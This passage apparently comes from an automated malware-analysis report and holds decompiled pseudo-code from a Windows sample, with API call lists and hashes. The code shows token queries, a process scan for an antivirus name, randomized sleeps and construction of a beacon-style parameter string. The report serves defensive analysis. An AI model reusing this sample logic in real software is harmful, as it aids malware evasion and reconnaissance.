                                                        							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
                                                        							if(_t40 >= 0) {
                                                        								memcpy(_a8,  *_t44, 0x1c);
                                                        								_t48 = 1;
                                                        							}
                                                        							E012013CC(_t44);
                                                        						}
                                                        						NtClose(_v8); // executed
                                                        					}
                                                        					NtClose(_v12);
                                                        				}
                                                        				return _t48;
                                                        			}

                                                        APIs
                                                        • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 01204123
                                                        • NtOpenProcessToken.NTDLL(00000000,00000008,00000000), ref: 01204136
                                                        • NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,00000000), ref: 01204152
                                                          • Part of subcall function 01205FBC: RtlAllocateHeap.NTDLL(00000000,00000000,01202035), ref: 01205FC8
                                                        • NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,00000000), ref: 0120416F
                                                        • memcpy.NTDLL(00000000,00000000,0000001C), ref: 0120417C
                                                        • NtClose.NTDLL(00000000), ref: 0120418E
                                                        • NtClose.NTDLL(00000000), ref: 01204198
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
                                                        • Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp
                                                        • Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp
                                                        • Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp
                                                        • Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp
                                                        Similarity
                                                        • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                                        • String ID:
                                                        • API String ID: 2575439697-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 73%
                                                        			E0120682B(signed int __edx, intOrPtr _a4) {
                                                        				struct _FILETIME _v12;
                                                        				char _v32;
                                                        				long _v40;
                                                        				void* _t14;
                                                        				void* _t16;
                                                        				int _t18;
                                                        				signed int _t20;
                                                        				void* _t22;
                                                        				signed int _t23;
                                                        				intOrPtr _t25;
                                                        				unsigned int _t29;
                                                        				signed int _t34;
                                                        				signed int _t41;
                                                        
                                                        				_t34 = __edx;
                                                        				_t14 = HeapCreate(0, 0x400000, 0); // executed
                                                        				 *0x120a290 = _t14;
                                                        				if(_t14 != 0) {
                                                        					 *0x120a180 = GetTickCount();
                                                        					_t16 = E01201DFA(_a4);
                                                        					if(_t16 != 0) {
                                                        						L10:
                                                        						return _t16;
                                                        					} else {
                                                        						goto L3;
                                                        					}
                                                        					do {
                                                        						L3:
                                                        						GetSystemTimeAsFileTime( &_v12);
                                                        						_t18 = SwitchToThread();
                                                        						_t29 = _v12.dwHighDateTime;
                                                        						_t20 = (_t29 << 0x00000020 | _v12.dwLowDateTime) >> 5;
                                                        						_push(0);
                                                        						_push(0x13);
                                                        						_push(_t29 >> 5);
                                                        						_push(_t20);
                                                        						L01207F3A();
                                                        						_t41 = _t18 + _t20;
                                                        						_t22 = E01201FE8(_a4, _t41);
                                                        						_t23 = 3;
                                                        						Sleep(_t23 << (_t41 & 0x00000007)); // executed
                                                        					} while (_t22 == 1);
                                                        					_t25 =  *0x120a2ac; // 0x2f0
                                                        					_v32 = 0;
                                                        					if(_t25 != 0) {
                                                        						__imp__(_t25,  &_v32);
                                                        						if(_t25 == 0) {
                                                        							_v40 = 0;
                                                        						}
                                                        						if(_v40 != 0) {
                                                        							 *0x120a2b8 = 1; // executed
                                                        						}
                                                        					}
                                                        					_t16 = E0120435F(_t34); // executed
                                                        					goto L10;
                                                        				}
                                                        				_t16 = 8;
                                                        				goto L10;
                                                        			}


                                                        APIs
                                                        • HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001), ref: 01206840
                                                        • GetTickCount.KERNEL32 ref: 01206857
                                                        • GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001), ref: 01206877
                                                        • SwitchToThread.KERNEL32(?,00000001), ref: 0120687D
                                                        • _aullrem.NTDLL(?,?,00000013,00000000), ref: 01206899
                                                        • Sleep.KERNELBASE(00000003,00000000,?,00000001), ref: 012068B6
                                                        • IsWow64Process.KERNEL32(000002F0,?,?,00000001), ref: 012068D4
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
                                                        • Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp
                                                        • Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp
                                                        • Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp
                                                        • Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp
                                                        Similarity
                                                        • API ID: Time$CountCreateFileHeapProcessSleepSwitchSystemThreadTickWow64_aullrem
                                                        • String ID:
                                                        • API String ID: 3690864001-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 100%
                                                        			E01202102() {
                                                        				char _v264;
                                                        				void* _v300;
                                                        				void* _t5;
                                                        				int _t8;
                                                        				intOrPtr _t9;
                                                        				int _t15;
                                                        				void* _t17;
                                                        
                                                        				_t15 = 0;
                                                        				_t5 = CreateToolhelp32Snapshot(2, 0); // executed
                                                        				_t17 = _t5;
                                                        				if(_t17 != 0) {
                                                        					_t8 = Process32First(_t17,  &_v300); // executed
                                                        					while(_t8 != 0) {
                                                        						_t9 =  *0x120a2d4; // 0x455d5a8
                                                        						_t2 = _t9 + 0x120bde4; // 0x73617661
                                                        						if(StrStrIA( &_v264, _t2) != 0) {
                                                        							_t15 = 1;
                                                        						} else {
                                                        							_t8 = Process32Next(_t17,  &_v300); // executed
                                                        							continue;
                                                        						}
                                                        						L7:
                                                        						CloseHandle(_t17);
                                                        						goto L8;
                                                        					}
                                                        					goto L7;
                                                        				}
                                                        				L8:
                                                        				return _t15;
                                                        			}

                                                        APIs
                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 01202112
                                                        • Process32First.KERNEL32(00000000,?), ref: 01202125
                                                        • StrStrIA.SHLWAPI(?,73617661,00000000,00000000), ref: 0120213F
                                                        • Process32Next.KERNEL32(00000000,?), ref: 01202151
                                                        • CloseHandle.KERNEL32(00000000), ref: 01202160
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
                                                        • Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp
                                                        • Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp
                                                        • Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp
                                                        • Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp
                                                        Similarity
                                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                        • String ID:
                                                        • API String ID: 420147892-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 21%
                                                        			E01205A5D(void* __ecx, intOrPtr* __esi, void* __eflags, signed int _a4, char _a8) {
                                                        				intOrPtr _v8;
                                                        				char _v12;
                                                        				signed int _t37;
                                                        				long _t39;
                                                        				long _t40;
                                                        				signed int _t41;
                                                        				intOrPtr _t42;
                                                        				signed int _t43;
                                                        				intOrPtr _t44;
                                                        				intOrPtr _t45;
                                                        				intOrPtr _t46;
                                                        				intOrPtr _t48;
                                                        				void* _t65;
                                                        				intOrPtr* _t67;
                                                        				intOrPtr* _t68;
                                                        				void* _t71;
                                                        
                                                        				_t68 = __esi;
                                                        				_t65 = E01203FC1(_t37, _a4);
                                                        				if(_t65 == 0) {
                                                        					L18:
                                                        					_t39 = GetLastError();
                                                        				} else {
                                                        					_t40 = GetVersion();
                                                        					_t71 = _t40 - 6;
                                                        					if(_t71 > 0 || _t71 == 0 && _t40 > 2) {
                                                        						_a4 = 4;
                                                        					} else {
                                                        						_a4 = 0;
                                                        					}
                                                        					__imp__(_t65, _a4, 0, 0, 0); // executed
                                                        					 *(_t68 + 0x10) = _t40;
                                                        					_t41 = E012013CC(_t65);
                                                        					if( *(_t68 + 0x10) == 0) {
                                                        						goto L18;
                                                        					} else {
                                                        						_t42 = E01203FC1(_t41,  *_t68);
                                                        						_v8 = _t42;
                                                        						if(_t42 == 0) {
                                                        							goto L18;
                                                        						} else {
                                                        							_t67 = __imp__; // 0x7029f5a0
                                                        							if(_a8 == 0) {
                                                        								L10:
                                                        								__imp__( *(_t68 + 0x10), _v8, 0x50, 0);
                                                        								 *((intOrPtr*)(_t68 + 0x14)) = _t42;
                                                        								_t43 = E012013CC(_v8);
                                                        								if( *((intOrPtr*)(_t68 + 0x14)) == 0) {
                                                        									goto L18;
                                                        								} else {
                                                        									_a4 = 0x100;
                                                        									_t44 = E01203FC1(_t43,  *((intOrPtr*)(_t68 + 4)));
                                                        									_v8 = _t44;
                                                        									if(_t44 == 0) {
                                                        										goto L18;
                                                        									} else {
                                                        										_t45 =  *0x120a2d4; // 0x455d5a8
                                                        										_t21 = _t45 + 0x120b76c; // 0x450047
                                                        										_t46 = _t21;
                                                        										__imp__( *((intOrPtr*)(_t68 + 0x14)), _t46, _v8, 0, 0, 0, _a4); // executed
                                                        										 *((intOrPtr*)(_t68 + 0x18)) = _t46;
                                                        										E012013CC(_v8);
                                                        										_t48 =  *((intOrPtr*)(_t68 + 0x18));
                                                        										if(_t48 == 0) {
                                                        											goto L18;
                                                        										} else {
                                                        											_v12 = 4;
                                                        											__imp__(_t48, 0x1f,  &_a4,  &_v12);
                                                        											if(_t48 != 0) {
                                                        												_a4 = _a4 | 0x00000100;
                                                        												 *_t67( *((intOrPtr*)(_t68 + 0x18)), 0x1f,  &_a4, 4);
                                                        											}
                                                        											_push(4);
                                                        											_push( &_a8);
                                                        											_push(6);
                                                        											_push( *((intOrPtr*)(_t68 + 0x18)));
                                                        											if( *_t67() == 0) {
                                                        												goto L18;
                                                        											} else {
                                                        												_push(4);
                                                        												_push( &_a8);
                                                        												_push(5);
                                                        												_push( *((intOrPtr*)(_t68 + 0x18)));
                                                        												if( *_t67() == 0) {
                                                        													goto L18;
                                                        												} else {
                                                        													_t39 = 0;
                                                        												}
                                                        											}
                                                        										}
                                                        									}
                                                        								}
                                                        							} else {
                                                        								_t42 =  *_t67( *(_t68 + 0x10), 3,  &_a8, 4);
                                                        								if(_t42 == 0) {
                                                        									goto L18;
                                                        								} else {
                                                        									goto L10;
                                                        								}
                                                        							}
                                                        						}
                                                        					}
                                                        				}
                                                        				return _t39;
                                                        			}

                                                        0x01205a5d
                                                        0x01205a6c
                                                        0x01205a72
                                                        0x01205ba8
                                                        0x01205ba8
                                                        0x01205a78
                                                        0x01205a78
                                                        0x01205a7e
                                                        0x01205a80
                                                        0x01205a8e
                                                        0x01205a89
                                                        0x01205a89
                                                        0x01205a89
                                                        0x01205a9c
                                                        0x01205aa3
                                                        0x01205aa6
                                                        0x01205aae
                                                        0x00000000
                                                        0x01205ab4
                                                        0x01205ab6
                                                        0x01205abd
                                                        0x01205ac0
                                                        0x00000000
                                                        0x01205ac6
                                                        0x01205ac9
                                                        0x01205acf
                                                        0x01205ae6
                                                        0x01205aef
                                                        0x01205af8
                                                        0x01205afb
                                                        0x01205b03
                                                        0x00000000
                                                        0x01205b09
                                                        0x01205b11
                                                        0x01205b14
                                                        0x01205b1d
                                                        0x01205b20
                                                        0x00000000
                                                        0x01205b26
                                                        0x01205b29
                                                        0x01205b34
                                                        0x01205b34
                                                        0x01205b3e
                                                        0x01205b47
                                                        0x01205b4a
                                                        0x01205b4f
                                                        0x01205b54
                                                        0x00000000
                                                        0x01205b56
                                                        0x01205b61
                                                        0x01205b68
                                                        0x01205b70
                                                        0x01205b72
                                                        0x01205b80
                                                        0x01205b80
                                                        0x01205b82
                                                        0x01205b87
                                                        0x01205b88
                                                        0x01205b8a
                                                        0x01205b91
                                                        0x00000000
                                                        0x01205b93
                                                        0x01205b93
                                                        0x01205b98
                                                        0x01205b99
                                                        0x01205b9b
                                                        0x01205ba2
                                                        0x00000000
                                                        0x01205ba4
                                                        0x01205ba4
                                                        0x01205ba4
                                                        0x01205ba2
                                                        0x01205b91
                                                        0x01205b54
                                                        0x01205b20
                                                        0x01205ad1
                                                        0x01205adc
                                                        0x01205ae0
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x01205ae0
                                                        0x01205acf
                                                        0x01205ac0
                                                        0x01205aae
                                                        0x01205bb1

                                                        APIs
                                                          • Part of subcall function 01203FC1: lstrlen.KERNEL32(?,00000000,05769CD0,7742C740,012035B6,05769ED5,0120454B,0120454B,?,0120454B,?,69B25F44,E8FA7DD7,00000000), ref: 01203FC8
                                                          • Part of subcall function 01203FC1: mbstowcs.NTDLL ref: 01203FF1
                                                          • Part of subcall function 01203FC1: memset.NTDLL ref: 01204003
                                                        • GetVersion.KERNEL32(00000000,0000EA60,00000008,?,?,?,0120135B,74B481D0,00000000,05769698,?,?,012030D3,?,05769698,0000EA60), ref: 01205A78
                                                        • GetLastError.KERNEL32(00000000,0000EA60,00000008,?,?,?,0120135B,74B481D0,00000000,05769698,?,?,012030D3,?,05769698,0000EA60), ref: 01205BA8
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
                                                        • Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp
                                                        • Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp
                                                        • Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp
                                                        • Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp
                                                        Similarity
                                                        • API ID: ErrorLastVersionlstrlenmbstowcsmemset
                                                        • String ID:
                                                        • API String ID: 4097109750-0
                                                        • Opcode ID: fc9d3fca0c1421ea7e8cca873a410c366f0dec3af3767d2933c1c7666aef2ce4
                                                        • Instruction ID: 1f16b6c874f5ada4a366435b332d4da90eec4f47d17d3e25c9f49d8f14576673
                                                        • Opcode Fuzzy Hash: fc9d3fca0c1421ea7e8cca873a410c366f0dec3af3767d2933c1c7666aef2ce4
                                                        • Instruction Fuzzy Hash: 6841707151060ABFEF329F64CC89E6A7BB9EF04740F004629B745964D6E770EA84DF60
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 70%
                                                        			E012048C2(long __eax, void* __edx, intOrPtr _a8, intOrPtr _a12, void* _a20, intOrPtr _a28) {
                                                        				intOrPtr _v4;
                                                        				intOrPtr _v8;
                                                        				intOrPtr _v12;
                                                        				intOrPtr _v16;
                                                        				void* _v24;
                                                        				intOrPtr _v40;
                                                        				void* __ecx;
                                                        				void* __edi;
                                                        				intOrPtr _t31;
                                                        				intOrPtr _t32;
                                                        				intOrPtr _t33;
                                                        				intOrPtr _t34;
                                                        				intOrPtr _t35;
                                                        				void* _t38;
                                                        				intOrPtr _t39;
                                                        				int _t42;
                                                        				void* _t43;
                                                        				intOrPtr _t44;
                                                        				intOrPtr _t48;
                                                        				intOrPtr _t52;
                                                        				intOrPtr _t55;
                                                        				intOrPtr _t56;
                                                        				intOrPtr _t62;
                                                        				intOrPtr _t66;
                                                        				intOrPtr* _t68;
                                                        				void* _t69;
                                                        				intOrPtr _t78;
                                                        				intOrPtr _t81;
                                                        				intOrPtr _t84;
                                                        				int _t87;
                                                        				intOrPtr _t88;
                                                        				int _t91;
                                                        				intOrPtr _t92;
                                                        				int _t95;
                                                        				void* _t98;
                                                        				void* _t99;
                                                        				void* _t103;
                                                        				intOrPtr _t105;
                                                        				long _t107;
                                                        				intOrPtr _t108;
                                                        				intOrPtr* _t109;
                                                        				long _t110;
                                                        				int _t111;
                                                        				void* _t112;
                                                        				void* _t113;
                                                        				void* _t114;
                                                        				void* _t115;
                                                        				void* _t117;
                                                        				void* _t118;
                                                        				void* _t120;
                                                        				void* _t121;
                                                        
                                                        				_t103 = __edx;
                                                        				_t110 = __eax;
                                                        				_v8 = 8;
                                                        				_t117 = RtlAllocateHeap( *0x120a290, 0, 0x800);
                                                        				if(_t117 != 0) {
                                                        					if(_t110 == 0) {
                                                        						_t110 = GetTickCount();
                                                        					}
                                                        					_t31 =  *0x120a018; // 0x4ef75f3d
                                                        					asm("bswap eax");
                                                        					_t32 =  *0x120a014; // 0x5cb11ae7
                                                        					asm("bswap eax");
                                                        					_t33 =  *0x120a010; // 0x15dc9586
                                                        					asm("bswap eax");
                                                        					_t34 =  *0x120a00c; // 0x8e03bf7
                                                        					asm("bswap eax");
                                                        					_t35 =  *0x120a2d4; // 0x455d5a8
                                                        					_t2 = _t35 + 0x120b622; // 0x74666f73
                                                        					_t111 = wsprintfA(_t117, _t2, 2, 0x3d163, _t34, _t33, _t32, _t31,  *0x120a02c,  *0x120a004, _t110);
                                                        					_t38 = E01206A9F();
                                                        					_t39 =  *0x120a2d4; // 0x455d5a8
                                                        					_t3 = _t39 + 0x120b662; // 0x74707526
                                                        					_t42 = wsprintfA(_t111 + _t117, _t3, _t38);
                                                        					_t120 = _t118 + 0x38;
                                                        					_t112 = _t111 + _t42;
                                                        					if(_a12 != 0) {
                                                        						_t92 =  *0x120a2d4; // 0x455d5a8
                                                        						_t7 = _t92 + 0x120b66d; // 0x732526
                                                        						_t95 = wsprintfA(_t112 + _t117, _t7, _a12);
                                                        						_t120 = _t120 + 0xc;
                                                        						_t112 = _t112 + _t95;
                                                        					}
                                                        					_t43 = E01202C60(_t99);
                                                        					_t44 =  *0x120a2d4; // 0x455d5a8
                                                        					_t9 = _t44 + 0x120b38a; // 0x6d697426
                                                        					_t113 = _t112 + wsprintfA(_t112 + _t117, _t9, _t43, _t103);
                                                        					_t48 =  *0x120a2d4; // 0x455d5a8
                                                        					_t11 = _t48 + 0x120b33b; // 0x74636126
                                                        					_t114 = _t113 + wsprintfA(_t113 + _t117, _t11, 0);
                                                        					_t52 =  *0x120a32c; // 0x57695b0
                                                        					_t121 = _t120 + 0x1c;
                                                        					if(_t52 != 0) {
                                                        						_t88 =  *0x120a2d4; // 0x455d5a8
                                                        						_t13 = _t88 + 0x120b685; // 0x73797326
                                                        						_t91 = wsprintfA(_t114 + _t117, _t13, _t52);
                                                        						_t121 = _t121 + 0xc;
                                                        						_t114 = _t114 + _t91;
                                                        					}
                                                        					_t105 =  *0x120a37c; // 0x5769630
                                                        					_a28 = E01203A66(0x120a00a, _t105 + 4);
                                                        					_t55 =  *0x120a31c; // 0x57695e0
                                                        					_t107 = 0;
                                                        					if(_t55 != 0) {
                                                        						_t84 =  *0x120a2d4; // 0x455d5a8
                                                        						_t16 = _t84 + 0x120b8e9; // 0x3d736f26
                                                        						_t87 = wsprintfA(_t114 + _t117, _t16, _t55);
                                                        						_t121 = _t121 + 0xc;
                                                        						_t114 = _t114 + _t87;
                                                        					}
                                                        					_t56 =  *0x120a318; // 0x0
                                                        					if(_t56 != _t107) {
                                                        						_t81 =  *0x120a2d4; // 0x455d5a8
                                                        						_t18 = _t81 + 0x120b8e2; // 0x3d706926
                                                        						wsprintfA(_t114 + _t117, _t18, _t56);
                                                        					}
                                                        					if(_a28 != _t107) {
                                                        						_t98 = RtlAllocateHeap( *0x120a290, _t107, 0x800);
                                                        						if(_t98 != _t107) {
                                                        							E01202C46(GetTickCount());
                                                        							_t62 =  *0x120a37c; // 0x5769630
                                                        							__imp__(_t62 + 0x40);
                                                        							asm("lock xadd [eax], ecx");
                                                        							_t66 =  *0x120a37c; // 0x5769630
                                                        							__imp__(_t66 + 0x40);
                                                        							_t68 =  *0x120a37c; // 0x5769630
                                                        							_t69 = E01207156(1, _t103, _t117,  *_t68); // executed
                                                        							_t115 = _t69;
                                                        							asm("lock xadd [eax], ecx");
                                                        							if(_t115 != _t107) {
                                                        								StrTrimA(_t115, 0x12092ac);
                                                        								_push(_t115);
                                                        								_t108 = E01205C8D();
                                                        								_v4 = _t108;
                                                        								if(_t108 != 0) {
                                                        									 *_t115 = 0;
                                                        									__imp__(_t98, _a8);
                                                        									_t109 = __imp__;
                                                        									 *_t109(_t98, _t108);
                                                        									 *_t109(_t98, _t115);
                                                        									_t78 = E01203097(0xffffffffffffffff, _t98, _v12, _v8); // executed
                                                        									_v40 = _t78;
                                                        									if(_t78 != 0 && _t78 != 0x10d2) {
                                                        										E01203546();
                                                        									}
                                                        									HeapFree( *0x120a290, 0, _v24);
                                                        								}
                                                        								HeapFree( *0x120a290, 0, _t115);
                                                        								_t107 = 0;
                                                        							}
                                                        							HeapFree( *0x120a290, _t107, _t98);
                                                        						}
                                                        						HeapFree( *0x120a290, _t107, _a20);
                                                        					}
                                                        					RtlFreeHeap( *0x120a290, _t107, _t117); // executed
                                                        				}
                                                        				return _v16;
                                                        			}

                                                        0x012048c2
                                                        0x012048d6
                                                        0x012048d8
                                                        0x012048e6
                                                        0x012048ea
                                                        0x012048f2
                                                        0x012048fa
                                                        0x012048fa
                                                        0x012048fc
                                                        0x01204908
                                                        0x01204917
                                                        0x0120491c
                                                        0x0120491f
                                                        0x01204924
                                                        0x01204927
                                                        0x0120492c
                                                        0x0120492f
                                                        0x0120493b
                                                        0x01204948
                                                        0x0120494a
                                                        0x01204950
                                                        0x01204955
                                                        0x01204960
                                                        0x01204962
                                                        0x01204965
                                                        0x0120496b
                                                        0x0120496d
                                                        0x01204976
                                                        0x01204981
                                                        0x01204983
                                                        0x01204986
                                                        0x01204986
                                                        0x01204988
                                                        0x0120498f
                                                        0x01204994
                                                        0x012049a1
                                                        0x012049a3
                                                        0x012049a8
                                                        0x012049b6
                                                        0x012049b8
                                                        0x012049bd
                                                        0x012049c2
                                                        0x012049c5
                                                        0x012049ca
                                                        0x012049d5
                                                        0x012049d7
                                                        0x012049da
                                                        0x012049da
                                                        0x012049dc
                                                        0x012049ef
                                                        0x012049f3
                                                        0x012049f8
                                                        0x012049fc
                                                        0x012049ff
                                                        0x01204a04
                                                        0x01204a0f
                                                        0x01204a11
                                                        0x01204a14
                                                        0x01204a14
                                                        0x01204a16
                                                        0x01204a1d

                                                        APIs
                                                        • RtlAllocateHeap.NTDLL(00000000,00000800,?), ref: 012048E0
                                                        • GetTickCount.KERNEL32 ref: 012048F4
                                                        • wsprintfA.USER32 ref: 01204943
                                                        • wsprintfA.USER32 ref: 01204960
                                                        • wsprintfA.USER32 ref: 01204981
                                                        • wsprintfA.USER32 ref: 0120499F
                                                        • wsprintfA.USER32 ref: 012049B4
                                                        • wsprintfA.USER32 ref: 012049D5
                                                        • wsprintfA.USER32 ref: 01204A0F
                                                        • wsprintfA.USER32 ref: 01204A2F
                                                        • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 01204A4A
                                                        • GetTickCount.KERNEL32 ref: 01204A5A
                                                        • RtlEnterCriticalSection.NTDLL(057695F0), ref: 01204A6E
                                                        • RtlLeaveCriticalSection.NTDLL(057695F0), ref: 01204A8C
                                                          • Part of subcall function 01207156: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,00000000,01204A9F,00000000,05769630), ref: 01207181
                                                          • Part of subcall function 01207156: lstrlen.KERNEL32(00000000,?,00000000,01204A9F,00000000,05769630), ref: 01207189
                                                          • Part of subcall function 01207156: strcpy.NTDLL ref: 012071A0
                                                          • Part of subcall function 01207156: lstrcat.KERNEL32(00000000,00000000), ref: 012071AB
                                                          • Part of subcall function 01207156: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,01204A9F,?,00000000,01204A9F,00000000,05769630), ref: 012071C8
                                                        • StrTrimA.SHLWAPI(00000000,012092AC,00000000,05769630), ref: 01204ABA
                                                          • Part of subcall function 01205C8D: lstrlen.KERNEL32(0576887A,00000000,00000000,00000000,01204AC6,00000000), ref: 01205C9D
                                                          • Part of subcall function 01205C8D: lstrlen.KERNEL32(?), ref: 01205CA5
                                                          • Part of subcall function 01205C8D: lstrcpy.KERNEL32(00000000,0576887A), ref: 01205CB9
                                                          • Part of subcall function 01205C8D: lstrcat.KERNEL32(00000000,?), ref: 01205CC4
                                                        • lstrcpy.KERNEL32(00000000,?), ref: 01204AD8
                                                        • lstrcat.KERNEL32(00000000,00000000), ref: 01204AE6
                                                        • lstrcat.KERNEL32(00000000,00000000), ref: 01204AEA
                                                        • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 01204B1A
                                                        • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 01204B29
                                                        • HeapFree.KERNEL32(00000000,00000000,00000000,05769630), ref: 01204B39
                                                        • HeapFree.KERNEL32(00000000,?), ref: 01204B4A
                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 01204B58
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
                                                        • Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp
                                                        • Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp
                                                        • Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp
                                                        • Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp
                                                        Similarity
                                                        • API ID: wsprintf$Heap$Free$lstrcatlstrlen$AllocateCountCriticalSectionTickTrimlstrcpy$EnterLeavestrcpy
                                                        • String ID:
                                                        • API String ID: 1837416118-0
                                                        • Opcode ID: b451fdd8e23fc292b5d3391a38f086e2fe9c6d860675cfc569e09a5a6be91015
                                                        • Instruction ID: 25c4ebec4af610d412dc71c8f23f9e1ec59b13fe08384b49888a11898c2ffd80
                                                        • Opcode Fuzzy Hash: b451fdd8e23fc292b5d3391a38f086e2fe9c6d860675cfc569e09a5a6be91015
                                                        • Instruction Fuzzy Hash: 2E717B72500215AFD733EB68FC8CE5A7BEDFB88300B050725FA49C3257E636A9048B60
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 83%
                                                        			E012050A3(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                                        				struct %anon52 _v8;
                                                        				long _v12;
                                                        				char _v16;
                                                        				char _v20;
                                                        				signed int _v24;
                                                        				intOrPtr _v32;
                                                        				union _LARGE_INTEGER _v36;
                                                        				intOrPtr _v40;
                                                        				void* _v44;
                                                        				void _v88;
                                                        				char _v92;
                                                        				struct %anon52 _t46;
                                                        				intOrPtr _t51;
                                                        				long _t53;
                                                        				void* _t54;
                                                        				struct %anon52 _t61;
                                                        				long _t65;
                                                        				signed int _t66;
                                                        				long _t68;
                                                        				void* _t69;
                                                        				void* _t71;
                                                        				signed int _t72;
                                                        				intOrPtr _t74;
                                                        				intOrPtr _t76;
                                                        				void** _t78;
                                                        				void* _t80;
                                                        
                                                        				_t74 = __edx;
                                                        				_v92 = 0;
                                                        				memset( &_v88, 0, 0x2c);
                                                        				_t46 = CreateWaitableTimerA(0, 1, 0);
                                                        				_v44 = _t46;
                                                        				if(_t46 == 0) {
                                                        					_v8.LowPart = GetLastError();
                                                        				} else {
                                                        					_push(0xffffffff);
                                                        					_push(0xff676980);
                                                        					_push(0);
                                                        					_push( *0x120a298);
                                                        					_v20 = 0;
                                                        					_v16 = 0;
                                                        					L01207DDC();
                                                        					_v36.LowPart = _t46;
                                                        					_v32 = _t74;
                                                        					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
                                                        					_t51 =  *0x120a2c4; // 0x2ec
                                                        					_v40 = _t51;
                                                        					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
                                                        					_v8.LowPart = _t53;
                                                        					if(_t53 == 0) {
                                                        						if(_a8 != 0) {
                                                        							L4:
                                                        							 *0x120a2a4 = 5;
                                                        						} else {
                                                        							_t69 = E01205335(_t74); // executed
                                                        							if(_t69 != 0) {
                                                        								goto L4;
                                                        							}
                                                        						}
                                                        						_v12 = 0;
                                                        						L6:
                                                        						L6:
                                                        						if(_v12 == 1 && ( *0x120a2b8 & 0x00000001) == 0) {
                                                        							_v12 = 2;
                                                        						}
                                                        						_t72 = _v12;
                                                        						_t58 = _t72 << 4;
                                                        						_t76 = _t80 + (_t72 << 4) - 0x54;
                                                        						_t73 = _t72 + 1;
                                                        						_v24 = _t72 + 1;
                                                        						_t61 = E01205242( &_v20, _t73, _t76, _t73, _t80 + _t58 - 0x58, _t76,  &_v16); // executed
                                                        						_v8.LowPart = _t61;
                                                        						if(_t61 != 0) {
                                                        							goto L17;
                                                        						}
                                                        						_t66 = _v24;
                                                        						_t90 = _t66 - 3;
                                                        						_v12 = _t66;
                                                        						if(_t66 != 3) {
                                                        							goto L6;
                                                        						} else {
                                                        							_t68 = E012074CB(_t73, _t90,  &_v92, _a4, _a8); // executed
                                                        							_v8.LowPart = _t68;
                                                        						}
                                                        						goto L12;
                                                        						L17:
                                                        						__eflags = _t61 - 0x10d2;
                                                        						if(_t61 != 0x10d2) {
                                                        							_push(0xffffffff);
                                                        							_push(0xff676980);
                                                        							_push(0);
                                                        							_push( *0x120a29c);
                                                        							goto L21;
                                                        						} else {
                                                        							__eflags =  *0x120a2a0; // 0x1
                                                        							if(__eflags == 0) {
                                                        								goto L12;
                                                        							} else {
                                                        								_t61 = E01203546();
                                                        								_push(0xffffffff);
                                                        								_push(0xdc3cba00);
                                                        								_push(0);
                                                        								_push( *0x120a2a0);
                                                        								L21:
                                                        								L01207DDC();
                                                        								_v36.LowPart = _t61;
                                                        								_v32 = _t76;
                                                        								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
                                                        								_t65 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
                                                        								__eflags = _t65;
                                                        								_v8.LowPart = _t65;
                                                        								if(_t65 == 0) {
                                                        									goto L6;
                                                        								} else {
                                                        									goto L12;
